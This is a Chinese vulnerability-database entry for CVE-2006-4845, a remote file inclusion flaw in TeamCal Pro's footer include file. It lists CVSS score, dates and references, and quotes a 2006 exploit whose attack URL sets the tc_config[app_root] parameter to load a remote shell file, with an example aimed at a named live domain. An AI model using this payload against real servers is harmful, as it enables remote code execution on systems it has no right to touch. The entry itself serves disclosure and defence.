TeamCal Pro 'includes/footer.html.inc.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111036 漏洞类型 输入验证
发布时间 2006-09-14 更新时间 2006-09-20
CVE编号 CVE-2006-4845 CNNVD-ID CNNVD-200609-298
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2368
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-298
|漏洞详情
TeamCalPro的includes/footer.html.inc.php中存在PHP远程文件包含漏洞,远程攻击者可以通过tc_config[app_root]参数中的URL执行任意PHP代码。
|漏洞EXP
#########################################################################
#Author:PSYCH@  psych0path@hackermail.com
#
#                                                            
#########################################################################
#TeamCal Pro 2.8.001 (app_root) Remote file inclusion Vulnerabilities
#Demo: www.lewe.com/tcpro/
#
#########################################################################
#Code:
#
#include( $tc_config['app_root']."includes/footer.html.inc.php" );
#
#########################################################################
#Exploit
#
#http://site.com/path/includes/footer.html.inc.php?tc_config[app_root]=shell.txt?
#
#Example:www.teamcounter.com/tcpro/includes/footer.html.inc.php?tc_config[app_root]=shell.txt?
#
#########################################################################
#Thnx:Warhack & mAfiAcarLEs & DarkXBoyZ
#
#
#########################################################################

# milw0rm.com [2006-09-14]
|参考资料

来源:XF
名称:teamcal-pro-footer-file-include(28956)
链接:http://xforce.iss.net/xforce/xfdb/28956
来源:BID
名称:20036
链接:http://www.securityfocus.com/bid/20036
来源:BID
名称:20030
链接:http://www.securityfocus.com/bid/20030
来源:VUPEN
名称:ADV-2006-3630
链接:http://www.frsirt.com/english/advisories/2006/3630
来源:SECUNIA
名称:21933
链接:http://secunia.com/advisories/21933
来源:MILW0RM
名称:2368
链接:http://milw0rm.com/exploits/2368